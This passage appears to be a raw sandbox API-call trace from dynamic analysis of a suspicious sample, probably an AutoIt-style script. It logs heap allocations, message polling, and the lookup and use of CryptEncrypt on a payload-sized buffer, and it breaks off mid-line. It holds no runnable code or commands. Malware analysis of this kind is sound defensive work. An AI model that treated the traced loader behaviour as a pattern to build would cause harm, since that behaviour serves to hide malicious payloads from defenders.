[0238.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f46) returned 0x2f14818 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0238.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0238.927] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0238.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0238.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f46) returned 0x2f14818 [0238.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f28 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f48 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0238.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0238.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15f46) returned 0x2e80330 [0238.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0238.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0238.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0238.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0238.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.937] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0238.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0238.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0238.937] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0238.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0238.938] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0238.938] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.938] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.938] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.938] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0238.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0238.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0238.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0238.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0238.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0238.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0238.942] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.942] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15f46, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15f48) returned 1 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0238.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0238.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 